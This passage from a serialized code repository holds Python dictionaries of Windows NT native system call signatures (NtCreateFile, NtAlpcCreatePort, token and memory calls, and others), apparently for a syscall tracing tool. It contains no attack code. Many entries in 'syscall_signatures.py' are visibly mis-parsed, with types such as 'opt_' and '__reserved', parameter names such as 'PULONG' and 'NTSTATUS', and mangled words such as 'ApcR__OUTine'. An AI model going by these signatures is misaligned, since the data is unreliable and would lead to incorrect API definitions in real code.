\"NtQueryTimerResolution\": (3, [\"PULONG\", \"PULONG\", \"PULONG\"], [\"MinimumResolution\", \"MaximumResolution\", \"CurrentResolution\"], \"NTSTATUS\", [\"__OUT\", \"__OUT\", \"__OUT\"]), \"NTSetSystemTime\": (2, [\"PLARGE_INTEGER\", \"PLARGE_INTEGER\"], [\"SystemTime\", \"PreviousTime\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NTSetTimerResolution\": (3, [\"ULONG\", \"BOOLEAN\", \"PULONG\"], [\"DesiredResolution\", \"SetResolution\", \"CurrentResolution\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\"]), \"RtlTimeFieldsToTime\": (2, [\"PTIME_FIELDS\", \"PLARGE_INTEGER\"], [\"TimeFields\", \"Time\"], \"BOOLEAN\", [\"__IN\", \"__OUT\"]), \"RtlTimeToTimeFields\": (2, [\"PLARGE_INTEGER\", \"PTIME_FIELDS\"], [\"Time\", \"TimeFields\"], \"VOID\", [\"__IN\", \"__OUT\"]), \"NtAllocateVirtualMemory\": (6, [\"HANDLE\", \"PVOID\", \"ULONG_PTR\", \"PSIZE_T\", \"ULONG\", \"ULONG\"], [\"ProcessHandle\", \"*BaseAddress\", \"ZeroBits\", \"RegionSize\", \"AllocationType\", \"Protect\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__IN\", \"__IN_OUT\", \"__IN\", \"__IN\"]), \"NtClose\": (1, [\"HANDLE\"], [\"Handle\"], \"NTSTATUS\", [\"__IN\"]), \"NtCreateFile\": (11, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PIO_STATUS_BLOCK\", \"PLARGE_INTEGER\", \"ULONG\", \"ULONG\", \"ULONG\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"FileHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"IoStatusBlock\", \"AllocationSize\", \"FileAttributes\", \"ShareAccess\", \"CreateDisposition\", \"CreateOptions\", \"EaBuffer\", \"EaLength\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__OUT\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtCreateSection\": (7, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PLARGE_INTEGER\", \"ULONG\", \"ULONG\", \"HANDLE\"], [\"SectionHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"MaximumSize\", \"SectionPageProtection\", \"AllocationAttributes\", \"FileHandle\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtDeviceIoControlFile\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"IoControlCode\", \"InputBuffer\", \"InputBufferLength\", \"OutputBuffer\", \"OutputBufferLength\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__OUT_opt\", \"__IN\"]), \"NtDuplicateToken\": (6, [\"HANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"BOOLEAN\", \"TOKEN_TYPE\", \"PHANDLE\"], [\"ExistingTokenHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"EffectiveOnly\", \"TokenType\", \"NewTokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtFlushBuffersFileEx\": (5, [\"HANDLE\", \"ULONG\", \"PVOID\", \"ULONG\", \"PIO_STATUS_BLOCK\"], [\"FileHandle\", \"Flags\", \"Parameters\", \"ParametersSize\", \"IoStatusBlock\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtFreeVirtualMemory\": (4, [\"HANDLE\", \"PVOID\", \"PSIZE_T\", \"ULONG\"], [\"ProcessHandle\", \"*BaseAddress\", \"RegionSize\", \"FreeType\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__IN_OUT\", \"__IN\"]), \"NtFsControlFile\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"FsControlCode\", \"InputBuffer\", \"InputBufferLength\", \"OutputBuffer\", \"OutputBufferLength\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__OUT_opt\", \"__IN\"]), \"NtLockFile\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PLARGE_INTEGER\", \"PLARGE_INTEGER\", \"ULONG\", \"BOOLEAN\", \"BOOLEAN\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"ByteOffset\", \"Length\", \"Key\", \"FailImmediately\", \"ExclusiveLock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtOpenFile\": (6, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"ULONG\"], [\"FileHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"IoStatusBlock\", \"ShareAccess\", \"OpenOptions\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtOpenProcessToken\": (3, [\"HANDLE\", \"ACCESS_MASK\", \"PHANDLE\"], [\"ProcessHandle\", \"DesiredAccess\", \"TokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\"]), \"NtOpenProcessTokenEx\": (4, [\"HANDLE\", \"ACCESS_MASK\", \"ULONG\", \"PHANDLE\"], [\"ProcessHandle\", \"DesiredAccess\", \"HandleAttributes\", \"TokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtOpenThreadToken\": (4, [\"HANDLE\", \"ACCESS_MASK\", \"BOOLEAN\", \"PHANDLE\"], [\"ThreadHandle\", \"DesiredAccess\", \"OpenAsSelf\", \"TokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtOpenThreadTokenEx\": (5, [\"HANDLE\", \"ACCESS_MASK\", \"BOOLEAN\", \"ULONG\", \"PHANDLE\"], [\"ThreadHandle\", \"DesiredAccess\", \"OpenAsSelf\", \"HandleAttributes\", \"TokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtPrivilegeCheck\": (3, [\"HANDLE\", \"PPRIVILEGE_SET\", \"PBOOLEAN\"], [\"ClientToken\", \"RequiredPrivileges\", \"Result\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__OUT\"]), \"NtQueryDirectoryFile\": (11, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE_INFORMATION_CLASS\", \"BOOLEAN\", \"PUNICODE_STRING\", \"BOOLEAN\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\", \"ReturnSingleEntry\", \"FileName\", \"RestartScan\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtQueryDirectoryFileEx\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE_INFORMATION_CLASS\", \"ULONG\", \"PUNICODE_STRING\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\", \"QueryFlags\", \"FileName\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtQueryInformationFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE_INFORMATION_CLASS\"], [\"FileHandle\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryInformationToken\": (5, [\"HANDLE\", \"TOKEN_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"TokenHandle\", \"TokenInformationClass\", \"TokenInformation\", \"TokenInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NtQueryObject\": (5, [\"HANDLE\", \"OBJECT_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"Handle\", \"ObjectInformationClass\", \"ObjectInformation\", \"ObjectInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN\", \"__OUT_opt\", \"__IN\", \"__OUT_opt\"]), \"NtQueryQuotaInformationFile\": (9, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"BOOLEAN\", \"PVOID\", \"ULONG\", \"PSID\", \"BOOLEAN\"], [\"FileHandle\", \"IoStatusBlock\", \"Buffer\", \"Length\", \"ReturnSingleEntry\", \"SidList\", \"SidListLength\", \"StartSid\", \"RestartScan\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtQuerySecurityObject\": (5, [\"HANDLE\", \"SECURITY_INFORMATION\", \"PSECURITY_DESCRIPTOR\", \"ULONG\", \"PULONG\"], [\"Handle\", \"SecurityInformation\", \"SecurityDescriptor\", \"Length\", \"LengthNeeded\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NtQueryVirtualMemory\": (6, [\"HANDLE\", \"PVOID\", \"MEMORY_INFORMATION_CLASS\", \"PVOID\", \"SIZE_T\", \"PSIZE_T\"], [\"ProcessHandle\", \"BaseAddress\", \"MemoryInformationClass\", \"MemoryInformation\", \"MemoryInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtQueryVolumeInformationFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FS_INFORMATION_CLASS\"], [\"FileHandle\", \"IoStatusBlock\", \"FsInformation\", \"Length\", \"FsInformationClass\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtReadFile\": (9, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"PLARGE_INTEGER\", \"PULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"Buffer\", \"Length\", \"ByteOffset\", \"Key\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN_opt\", \"__IN_opt\"]), \"NTSetInformationFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE_INFORMATION_CLASS\"], [\"FileHandle\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSetInformationThread\": (4, [\"HANDLE\", \"THREADINFOCLASS\", \"PVOID\", \"ULONG\"], [\"ThreadHandle\", \"ThreadInformationClass\", \"ThreadInformation\", \"ThreadInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSetInformationToken\": (4, [\"HANDLE\", \"TOKEN_INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"TokenHandle\", \"TokenInformationClass\", \"TokenInformation\", \"TokenInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSetQuotaInformationFile\": (4, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\"], [\"FileHandle\", \"IoStatusBlock\", \"Buffer\", \"Length\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\"]), \"NTSetSecurityObject\": (3, [\"HANDLE\", \"SECURITY_INFORMATION\", \"PSECURITY_DESCRIPTOR\"], [\"Handle\", \"SecurityInformation\", \"SecurityDescriptor\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtUnlockFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PLARGE_INTEGER\", \"PLARGE_INTEGER\", \"ULONG\"], [\"FileHandle\", \"IoStatusBlock\", \"ByteOffset\", \"Length\", \"Key\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtWriteFile\": (9, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"PLARGE_INTEGER\", \"PULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"Buffer\", \"Length\", \"ByteOffset\", \"Key\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\"])}\r\n" }, { "path": "start/syscall_signatures.py", "content": "syscall_signature = {'NtWorkerFactoryWorkerReady': (1, ['HANDLE'], ['WorkerFactoryHandle'], 'NTSTATUS', ['__IN']), 'NtMapUserPhysicalPagesScatter': (3, ['PVOID', 'ULONG_PTR', 'PULONG_PTR'], ['*VirtualAddresses', 'NumberOfPages', 'UserPfnArray'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtWaitForMultipleObjects32': (5, ['ULONG', 'PLONG', 'WAIT_TYPE', 'BOOLEAN', 'PLARGE_INTEGER'], ['ObjectCount', 'Handles', 'WaitType', 'Alertable', 'Time_Out'], 'Nt_WAIT_RESULT', [None, None, None, None, None]), 'NtReplyWaitReceivePortEx': (5, ['HANDLE', 'PVOID', 'PPORT_MESSAGE', 'PPORT_MESSAGE', 'PLARGE_INTEGER'], ['PortHandle', '*PortContext', 'ReplyMessage', 'ReceiveMessage', 'Time_Out'], 'NTSTATUS', ['__IN', '__OUT_opt', '__IN_opt', '__OUT_opt', '__IN_opt']), 'NtQueryDefaultUILanguage': (1, ['*LANGID'], ['DefaultUILanguageId'], 'NTSTATUS', [None]), 'NtApphelpCacheControl': (2, ['AHC_SERVICE_CLASS', 'PVOID'], ['ServiceClass', 'ServiceContext'], 'NTSTATUS', ['__IN_', '__IN_OUT_opt_']), 'NtCreateProcessEx': (9, ['HANDLE', 'ACCESS_MASK', 'OBJECT_ATTRIBUTES', 'HANDLE', 'BOOLEAN', 'HANDLE', 'HANDLE', 'HANDLE', 'BOOLEAN'], ['ProcessHandle', 'DesiredAccess', 'ObjectAttributes', 'ParentProcess', 'InheritObjectTable', 'SectionHandle', 'DebugPort', 'ExceptionPort', 'InJob'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN']), 'NtIsProcessInJob': (2, ['HANDLE', 'HANDLE'], ['ProcessHandle', 'JobHandle'], 'NTSTATUS', ['__IN_', '__IN_opt_']), 'NtAccessCheckByTypeAndAuditAlarm': (16, ['PUNICODE_STRING', 'PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'PSID', 'ACCESS_MASK', 'AUDIT_EVENT_TYPE', 'ULONG', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'BOOLEAN', 'PACCESS_MASK', 'PNTSYSAPI', 'PBOOLEAN'], ['SubsystemName', 'HandleId', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'PrincipalSelfSid', 'DesiredAccess', 'AuditType', 'Flags', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'ObjectCreation', 'GrantedAccess', 'NTSTATUS', 'GenerateOnClose'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', None, '__IN_', '__IN_', '__IN_', None, None, None]), 'NtTraceEvent': (4, ['HANDLE', 'ULONG', 'ULONG', 'PVOID'], ['TraceHandle', 'Flags', 'FieldSize', 'Fields'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtPowerInformation': (5, ['POWER__INFORMATION_LEVEL', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['InformationLevel', 'InputBuffer', 'InputBufferLength', '__OUTputBuffer', '__OUTputBufferLength'], 'NTSTATUS', ['__IN_', None, '__IN_', None, '__IN_']), 'NtAccessCheckByType': (11, ['PSECURITY_DESCRIPTOR', 'PSID', 'HANDLE', 'ACCESS_MASK', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'PPRIVILEGE_SET', 'PULONG', 'PACCESS_MASK', 'PNTSYSAPI'], ['SecurityDescriptor', 'PrincipalSelfSid', 'ClientToken', 'DesiredAccess', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'PrivilegeSet', 'PrivilegeSetLength', 'GrantedAccess', 'NTSTATUS'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', None, '__IN_', '__IN_', None, '__IN_OUT_', None, None]), 'NtAccessCheckByTypeResultList': (11, ['PSECURITY_DESCRIPTOR', 'PSID', 'HANDLE', 'ACCESS_MASK', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'PPRIVILEGE_SET', 'PULONG', 'PACCESS_MASK', 'PNTSYSAPI'], ['SecurityDescriptor', 'PrincipalSelfSid', 'ClientToken', 'DesiredAccess', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'PrivilegeSet', 'PrivilegeSetLength', 'GrantedAccess', 'NTSTATUS'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', None, '__IN_', '__IN_', None, '__IN_OUT_', None, None]), 'NtAccessCheckByTypeResultListAndAuditAlarm': (16, ['PUNICODE_STRING', 'PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'PSID', 'ACCESS_MASK', 'AUDIT_EVENT_TYPE', 'ULONG', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'BOOLEAN', 'PACCESS_MASK', 'PNTSYSAPI', 'PBOOLEAN'], ['SubsystemName', 'HandleId', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'PrincipalSelfSid', 'DesiredAccess', 'AuditType', 'Flags', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'ObjectCreation', 'GrantedAccess', 'NTSTATUS', 'GenerateOnClose'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', None, '__IN_', '__IN_', '__IN_', None, None, None]), 'NtAccessCheckByTypeResultListAndAuditAlarmByHandle': (17, ['PUNICODE_STRING', 'PVOID', 'HANDLE', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'PSID', 'ACCESS_MASK', 'AUDIT_EVENT_TYPE', 'ULONG', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'BOOLEAN', 'PACCESS_MASK', 'PNTSYSAPI', 'PBOOLEAN'], ['SubsystemName', 'HandleId', 'ClientToken', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'PrincipalSelfSid', 'DesiredAccess', 'AuditType', 'Flags', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'ObjectCreation', 'GrantedAccess', 'NTSTATUS', 'GenerateOnClose'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', None, '__IN_', '__IN_', '__IN_', None, None, None]), 'NtAddAtomEx': (4, ['PWSTR', 'ULONG', 'opt_', 'ULONG'], ['AtomName', 'Length', 'PRTL_ATOM', 'Flags'], 'NTSTATUS', [None, '__IN_', None, '__IN_']), 'NtAddBootEntry': (2, ['PBOOT_ENTRY', 'opt_'], ['BootEntry', 'PULONG'], 'NTSTATUS', ['__IN_', None]), 'NtAddDriverEntry': (2, ['PEFI_DRIVER_ENTRY', 'opt_'], ['DriverEntry', 'PULONG'], 'NTSTATUS', ['__IN_', None]), 'NtAdjustTokenClaimsAndDeviceGroups': (16, ['HANDLE', 'BOOLEAN', 'BOOLEAN', 'BOOLEAN', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_GROUPS', 'ULONG', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'ULONG', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'ULONG', 'PTOKEN_GROUPS', 'opt_', 'opt_', 'opt_'], ['TokenHandle', 'UserResetToDefault', 'DeviceResetToDefault', 'DeviceGroupsResetToDefault', 'NewUserState', 'NewDeviceState', 'NewDeviceGroupsState', 'UserBufferLength', 'PreviousUserState', 'DeviceBufferLength', 'PreviousDeviceState', 'DeviceGroupsBufferLength', 'PreviousDeviceGroups', 'PULONG', 'PULONG', 'PULONG'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_opt_', '__IN_opt_', '__IN_', None, '__IN_', None, '__IN_', None, None, None, None]), 'NtAlertThreadByThreadId': (1, ['DWORD'], ['threadID'], 'NTSTATUS', [None]), 'NtAllocateReserveObject': (3, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'MEMORY_RESERVE_TYPE'], ['MemoryReserveHandle', 'ObjectAttributes', 'Type'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN']), 'NtGetNextProcess': (5, ['HANDLE', 'ACCESS_MASK', 'ULONG', 'ULONG', 'PHANDLE'], ['ProcessHandle', 'DesiredAccess', 'HandleAttributes', 'Flags', 'NewProcessHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtGetNextThread': (6, ['HANDLE', 'HANDLE', 'ACCESS_MASK', 'ULONG', 'ULONG', 'PHANDLE'], ['ProcessHandle', 'ThreadHandle', 'DesiredAccess', 'HandleAttributes', 'Flags', 'NewThreadHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtQueueApcThreadEx': (6, ['HANDLE', 'HANDLE', 'PPS_APC_R__OUTINE', 'PVOID', 'PVOID', 'PVOID'], ['ThreadHandle', 'UserApcReserveHandle', 'ApcR__OUTine', 'ApcArgument1', 'ApcArgument2', 'ApcArgument3'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtUmsThreadYield': (1, ['PVOID'], ['SchedulerParam'], 'NTSTATUS', ['__IN']), 'NtAllocateUserPhysicalPages': (3, ['HANDLE', 'PULONG_PTR', 'PULONG_PTR'], ['ProcessHandle', 'NumberOfPages', 'UserPfnArray'], 'NTSTATUS', ['__IN', '__IN_OUT', '__OUT']), 'NtAllocateVirtualMemoryEx': (7, ['HANDLE', 'PVOID*', 'PSIZE_T', 'ULONG', 'ULONG', 'PMEM_EXTENDED_PARAMETER', 'ULONG'], ['ProcessHandle', 'BaseAddress', 'RegionSize', 'AllocationType', 'PageProtection', 'ExtendedParameters', 'ExtendedParameterCount'], 'NTSTATUS', ['__IN_', None, '__IN_OUT_', '__IN_', '__IN_', None, '__IN_']), 'NtAlpcAcceptConnectPort': (9, ['PHANDLE', 'HANDLE', 'ULONG', 'POBJECT_ATTRIBUTES', 'PALPC_PORT_ATTRIBUTES', 'PVOID', 'PPORT_MESSAGE', 'PALPC_MESSAGE_ATTRIBUTES', 'BOOLEAN'], ['PortHandle', 'ConnectionPortHandle', 'Flags', 'ObjectAttributes', 'PortAttributes', 'PortContext', 'ConnectionRequest', 'ConnectionMessageAttributes', 'AcceptConnection'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN_OUT_opt', '__IN']), 'NtAlpcCancelMessage': (3, ['HANDLE', 'ULONG', 'ALPC_CONTEXT_ATTRIBUTES'], ['PortHandle', 'Flags', 'MessageContext'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtAlpcCreatePort': (3, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'PALPC_PORT_ATTRIBUTES'], ['PortHandle', 'ObjectAttributes', 'PortAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt']), 'NtAlpcCreatePortSection': (6, ['HANDLE', 'ULONG', 'HANDLE', 'ULONG', 'PHANDLE', 'PULONG'], ['PortHandle', 'Flags', 'SectionHandle', 'SectionSize', 'AlpcSectionHandle', 'ActualSectionSize'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__OUT', '__OUT']), 'NtAlpcCreateResourceReserve': (4, ['HANDLE', '__reserved', 'SIZE_T', 'PHANDLE'], ['PortHandle', 'ULONG', 'MessageSize', 'ResourceID'], 'NTSTATUS', ['__IN', None, '__IN', '__OUT']), 'NtAlpcCreateSectionView': (3, ['HANDLE', '__reserved', 'PALPC_DATA_VIEW'], ['PortHandle', 'ULONG', 'ViewAttrbutes'], 'NTSTATUS', ['__IN', None, '__IN_OUT']), 'NtAlpcCreateSecurityContext': (3, ['HANDLE', '__reserved', 'PALPC_SECURITY_ATTRIBUTES'], ['PortHandle', 'ULONG', 'SecurityAttribute'], 'NTSTATUS', ['__IN', None, '__IN_OUT']), 'NtAlpcDeletePortSection': (3, ['HANDLE', '__reserved', 'HANDLE'], ['PortHandle', 'ULONG', 'SectionHandle'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcDeleteResourceReserve': (3, ['HANDLE', '__reserved', 'HANDLE'], ['PortHandle', 'ULONG', 'ResourceID'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcDeleteSectionView': (3, ['HANDLE', '__reserved', 'PVOID'], ['PortHandle', 'ULONG', 'ViewBase'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcDeleteSecurityContext': (3, ['HANDLE', '__reserved', 'HANDLE'], ['PortHandle', 'ULONG', 'ContextHandle'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcDisconnectPort': (2, ['HANDLE', 'ULONG'], ['PortHandle', 'Flags'], 'NTSTATUS', ['__IN', '__IN']), 'NtAlpcImpersonateClientOfPort': (3, ['HANDLE', 'PPORT_MESSAGE', '__reserved'], ['PortHandle', 'PortMessage', 'PVOID'], 'NTSTATUS', ['__IN', '__IN', None]), 'NtAlpcOpenSenderProcess': (6, ['HANDLE', 'HANDLE', 'PPORT_MESSAGE', '__reserved', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['ProcessHandle', 'PortHandle', 'PortMessage', 'ULONG', 'Access', 'ObjectAttribute'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, '__IN', '__IN']), 'NtAlpcOpenSenderThread': (6, ['HANDLE', 'HANDLE', 'PPORT_MESSAGE', '__reserved', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['ThreadHandle', 'PortHandle', 'PortMessage', 'ULONG', 'Access', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, '__IN', '__IN']), 'NtAlpcQueryInformation': (5, ['HANDLE', 'ALPC_PORT__INFORMATION_CLASS', '_bcount', 'ULONG', '__opt'], ['PortHandle', 'PortInformationClass', 'PVOID', 'Length', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtAlpcQueryInformationMessage': (6, ['HANDLE', 'PPORT_MESSAGE', 'ALPC_MESSAGE__INFORMATION_CLASS', '_bcount', 'ULONG', '__opt'], ['PortHandle', 'PortMessage', 'MessageInformationClass', 'PVOID', 'Length', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', '__IN', None, '__IN', None]), 'NtAlpcRevokeSecurityContext': (3, ['HANDLE', '__reserved', 'HANDLE'], ['PortHandle', 